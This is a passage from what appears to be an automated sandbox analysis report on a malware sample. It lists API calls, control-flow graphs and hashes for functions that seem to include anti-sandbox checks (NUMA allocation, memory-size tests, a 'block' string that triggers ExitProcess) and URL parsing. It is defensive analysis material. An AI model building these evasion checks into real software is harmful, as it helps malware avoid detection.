                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID: fplugins
                            • API String ID: 2500673778-38756186
                            • Opcode ID: 6135c4325571a6d1430a8c83f817d010532a211162c2dc428f151fb6291bd165
                            • Instruction ID: a940065ba8218ddacc4e4e865f66e48c980cf9e09f561a0aade6b1d89017d4a0
                            • Opcode Fuzzy Hash: 6135c4325571a6d1430a8c83f817d010532a211162c2dc428f151fb6291bd165
                            • Instruction Fuzzy Hash: C0E24C71A053418FD724DF29C488B6ABBE9FF89314F58856DE48DCB2A2DB31D845CB42
                            Function 008FF4D8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(012E6538), ref: 008FF4F5
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF583
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF5A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF65B
                            • lstrcpy.KERNEL32(00000000,012E6538), ref: 008FF69B
                            • lstrcpy.KERNEL32(00000000,012F9190), ref: 008FF6CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF77E
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008FF7FC
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF82C
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF87A
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 008FF8F8
                            • lstrlen.KERNEL32(012F90D0), ref: 008FF926
                            • lstrcpy.KERNEL32(00000000,012F90D0), ref: 008FF951
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FF973
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF9C4
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 008FFC12
                            • lstrlen.KERNEL32(012F90E0), ref: 008FFC40
                            • lstrcpy.KERNEL32(00000000,012F90E0), ref: 008FFC6B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FFC8D
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FFCDE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 270bce78fb7e34b81647ee95652d25c1a3fcb34921a76bc8876fbfadc80ccf88
                            • Instruction ID: 384bdd01deba234fba1a90d7da4c4828badd3ea0ec94aaa053745aa0a4bede91
                            • Opcode Fuzzy Hash: 270bce78fb7e34b81647ee95652d25c1a3fcb34921a76bc8876fbfadc80ccf88
                            • Instruction Fuzzy Hash: BDF14C70A0120A9FCB24DF79D854A69B7E5FF44714B18C1B9DA09DB3A2EB31DC52CB50
                            Function 008F8DF0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2721 8f8df0-8f8e14 StrCmpCA 2722 8f8e1d-8f8e36 2721->2722 2723 8f8e16-8f8e17 ExitProcess 2721->2723 2725 8f8e3c-8f8e41 2722->2725 2726 8f9032-8f903f call 8e2a20 2722->2726 2728 8f8e46-8f8e49 2725->2728 2730 8f8e4f 2728->2730 2731 8f9013-8f902c 2728->2731 2732 8f8f0d-8f8f1b StrCmpCA 2730->2732 2733 8f8f2d-8f8f3b StrCmpCA 2730->2733 2734 8f8f4d-8f8f5b StrCmpCA 2730->2734 2735 8f8f6d-8f8f7b StrCmpCA 2730->2735 2736 8f8f8d-8f8f9b StrCmpCA 2730->2736 2737 8f8eaa-8f8eb9 lstrlen 2730->2737 2738 8f8fa6-8f8fb4 StrCmpCA 2730->2738 2739 8f8e80-8f8e8f lstrlen 2730->2739 2740 8f8fbf-8f8fcd StrCmpCA 2730->2740 2741 8f8fd8-8f8fea lstrlen 2730->2741 2742 8f8e56-8f8e65 lstrlen 2730->2742 2743 8f8ed4-8f8ee2 StrCmpCA 2730->2743 2744 8f8ef4-8f8f08 StrCmpCA 2730->2744 2731->2726 2770 8f8e43 2731->2770 2732->2731 2758 8f8f21-8f8f28 2732->2758 2733->2731 2759 8f8f41-8f8f48 2733->2759 2734->2731 2760 8f8f61-8f8f68 2734->2760 2735->2731 2761 8f8f81-8f8f88 2735->2761 2736->2731 2745 8f8f9d-8f8fa4 2736->2745 2754 8f8ebb-8f8ec0 call 8e2a20 2737->2754 2755 8f8ec3-8f8ecf call 8e2930 2737->2755 2738->2731 2748 8f8fb6-8f8fbd 2738->2748 2752 8f8e99-8f8ea5 call 8e2930 2739->2752 2753 8f8e91-8f8e96 call 8e2a20 2739->2753 2740->2731 2749 8f8fcf-8f8fd6 2740->2749 2750 8f8fec-8f8ff1 call 8e2a20 2741->2750 2751 8f8ff4-8f9000 call 8e2930 2741->2751 2746 8f8e6f-8f8e7b call 8e2930 2742->2746 2747 8f8e67-8f8e6c call 8e2a20 2742->2747 2743->2731 2757 8f8ee8-8f8eef 2743->2757 2744->2731 2745->2731 2779 8f9003-8f9005 2746->2779 2747->2746 2748->2731 2749->2731 2750->2751 2751->2779 2752->2779 2753->2752 2754->2755 2755->2779 2757->2731 2758->2731 2759->2731 2760->2731 2761->2731 2770->2728 2779->2731 2780 8f9007-8f9009 2779->2780 2780->2731 2781 8f900b-8f900d lstrcpy 2780->2781 2781->2731
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: d611e1647cc446dfa7849ab579d3d6516bf0c0f67530138c9912a47e4c94aca9
                            • Instruction ID: 985337baa0c216396aa6d5c6f2fb52bd96905bf3e422fa83b058d4924518fc75
                            • Opcode Fuzzy Hash: d611e1647cc446dfa7849ab579d3d6516bf0c0f67530138c9912a47e4c94aca9
                            • Instruction Fuzzy Hash: 46513070A04A49EBC7309F75D888BBA77F4FB88704B50482EE682D3650EF74E5819B51
                            Function 008E4BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2793 8e4bc0-8e4bce 2794 8e4bd0-8e4bd5 2793->2794 2794->2794 2795 8e4bd7-8e4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 8e2a20 2794->2795
                            APIs
                            • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 008E4BF7
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 008E4C01
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 008E4C0B
                            • lstrlen.KERNEL32(?,00000000,?), ref: 008E4C1F
                            • InternetCrackUrlA.WININET(?,00000000), ref: 008E4C27
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ??2@$CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1683549937-4251816714
                            • Opcode ID: 298732c947e2c95ad62191e3825dffc0147a99adbae014f026d69173118ef358
                            • Instruction ID: e22f2fc63288737c430285cb4f4ce25872e19456ab8268e4f46e679b0013ce8f
                            • Opcode Fuzzy Hash: 298732c947e2c95ad62191e3825dffc0147a99adbae014f026d69173118ef358
                            • Instruction Fuzzy Hash: 75011B71D00218ABDB10DFA9E845B9EBBB8FB49320F008526F914E7290DB7459058BD4
                            Function 008E1030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2798 8e1030-8e1055 GetCurrentProcess VirtualAllocExNuma 2799 8e105e-8e107b VirtualAlloc 2798->2799 2800 8e1057-8e1058 ExitProcess 2798->2800 2801 8e107d-8e1080 2799->2801 2802 8e1082-8e1088 2799->2802 2801->2802 2803 8e108a-8e10ab VirtualFree 2802->2803 2804 8e10b1-8e10b6 2802->2804 2803->2804
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008E1046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 008E104D
                            • ExitProcess.KERNEL32 ref: 008E1058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008E106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 008E10AB
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: 51d9a3577c546cb3ddae93c3b0a5d135dbcc27e13465603aebab997031b82895
                            • Instruction ID: eb333bf29cb48e7ef82fddb73fbe30efc01a637665a02307d2c6684b6e6fcd79
                            • Opcode Fuzzy Hash: 51d9a3577c546cb3ddae93c3b0a5d135dbcc27e13465603aebab997031b82895
                            • Instruction Fuzzy Hash: A101D1717402447BEB204A656C2EFAA77E9E785B01F608414F704E7280DDB1E9008A64
                            Function 008FF070 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2805 8ff070-8ff095 call 8e2930 2808 8ff0a9-8ff0ad call 8e6c40 2805->2808 2809 8ff097-8ff09f 2805->2809 2812 8ff0b2-8ff0c8 StrCmpCA 2808->2812 2809->2808 2810 8ff0a1-8ff0a3 lstrcpy 2809->2810 2810->2808 2813 8ff0ca-8ff0e2 call 8e2a20 call 8e2930 2812->2813 2814 8ff0f1-8ff0f8 call 8e2a20 2812->2814 2823 8ff125-8ff180 call 8e2a20 * 10 2813->2823 2824 8ff0e4-8ff0ec 2813->2824 2820 8ff100-8ff108 2814->2820 2820->2820 2822 8ff10a-8ff117 call 8e2930 2820->2822 2822->2823 2831 8ff119 2822->2831 2824->2823 2826 8ff0ee-8ff0ef 2824->2826 2830 8ff11e-8ff11f lstrcpy 2826->2830 2830->2823 2831->2830
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF0A3
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 008FF0BE
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 008FF11F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: ERROR
                            • API String ID: 3722407311-2861137601
                            • Opcode ID: 20e6921b04042cfd05e51914b6bca02b96d6e46e9e10ecbabadb2779be003eeb
                            • Instruction ID: dd1d70bd10e40d534ff28cdf337184b1b3feab9bb139050009771f0c9d0e3d70
                            • Opcode Fuzzy Hash: 20e6921b04042cfd05e51914b6bca02b96d6e46e9e10ecbabadb2779be003eeb
                            • Instruction Fuzzy Hash: B6213D3162029A9BCB21FF7EDC46AAA37A8FF15704F005434B95ADB243DF70E9508791
                            Function 008F8DCB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2886 8f8dcb-8f8e14 StrCmpCA 2888 8f8e1d-8f8e36 2886->2888 2889 8f8e16-8f8e17 ExitProcess 2886->2889 2891 8f8e3c-8f8e41 2888->2891 2892 8f9032-8f903f call 8e2a20 2888->2892 2894 8f8e46-8f8e49 2891->2894 2896 8f8e4f 2894->2896 2897 8f9013-8f902c 2894->2897 2898 8f8f0d-8f8f1b StrCmpCA 2896->2898 2899 8f8f2d-8f8f3b StrCmpCA 2896->2899 2900 8f8f4d-8f8f5b StrCmpCA 2896->2900 2901 8f8f6d-8f8f7b StrCmpCA 2896->2901 2902 8f8f8d-8f8f9b StrCmpCA 2896->2902 2903 8f8eaa-8f8eb9 lstrlen 2896->2903 2904 8f8fa6-8f8fb4 StrCmpCA 2896->2904 2905 8f8e80-8f8e8f lstrlen 2896->2905 2906 8f8fbf-8f8fcd StrCmpCA 2896->2906 2907 8f8fd8-8f8fea lstrlen 2896->2907 2908 8f8e56-8f8e65 lstrlen 2896->2908 2909 8f8ed4-8f8ee2 StrCmpCA 2896->2909 2910 8f8ef4-8f8f08 StrCmpCA 2896->2910 2897->2892 2936 8f8e43 2897->2936 2898->2897 2924 8f8f21-8f8f28 2898->2924 2899->2897 2925 8f8f41-8f8f48 2899->2925 2900->2897 2926 8f8f61-8f8f68 2900->2926 2901->2897 2927 8f8f81-8f8f88 2901->2927 2902->2897 2911 8f8f9d-8f8fa4 2902->2911 2920 8f8ebb-8f8ec0 call 8e2a20 2903->2920 2921 8f8ec3-8f8ecf call 8e2930 2903->2921 2904->2897 2914 8f8fb6-8f8fbd 2904->2914 2918 8f8e99-8f8ea5 call 8e2930 2905->2918 2919 8f8e91-8f8e96 call 8e2a20 2905->2919 2906->2897 2915 8f8fcf-8f8fd6 2906->2915 2916 8f8fec-8f8ff1 call 8e2a20 2907->2916 2917 8f8ff4-8f9000 call 8e2930 2907->2917 2912 8f8e6f-8f8e7b call 8e2930 2908->2912 2913 8f8e67-8f8e6c call 8e2a20 2908->2913 2909->2897 2923 8f8ee8-8f8eef 2909->2923 2910->2897 2911->2897 2945 8f9003-8f9005 2912->2945 2913->2912 2914->2897 2915->2897 2916->2917 2917->2945 2918->2945 2919->2918 2920->2921 2921->2945 2923->2897 2924->2897 2925->2897 2926->2897 2927->2897 2936->2894 2945->2897 2946 8f9007-8f9009 2945->2946 2946->2897 2947 8f900b-8f900d lstrcpy 2946->2947 2947->2897
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 28972335fd30d6bfb42975e6d94842af977f1ac3b00f1a9684df438cf27fa948
                            • Instruction ID: 0541a07e733a8eb4464886d8b4b5bb5fc46d09ec76c1f306e6fdad3b727be269
                            • Opcode Fuzzy Hash: 28972335fd30d6bfb42975e6d94842af977f1ac3b00f1a9684df438cf27fa948
                            • Instruction Fuzzy Hash: 62E08620604349F7CB00ABB5DCACDDA7BB8FF49704B80453CF54597151EB309916CB69
                            Function 008E10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2948 8e10c0-8e10cb 2949 8e10d0-8e10dc 2948->2949 2951 8e10de-8e10f3 GlobalMemoryStatusEx 2949->2951 2952 8e10f5-8e1106 2951->2952 2953 8e1112-8e1114 ExitProcess 2951->2953 2954 8e111a-8e111d 2952->2954 2955 8e1108 2952->2955 2955->2953 2956 8e110a-8e1110 2955->2956 2956->2953 2956->2954
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
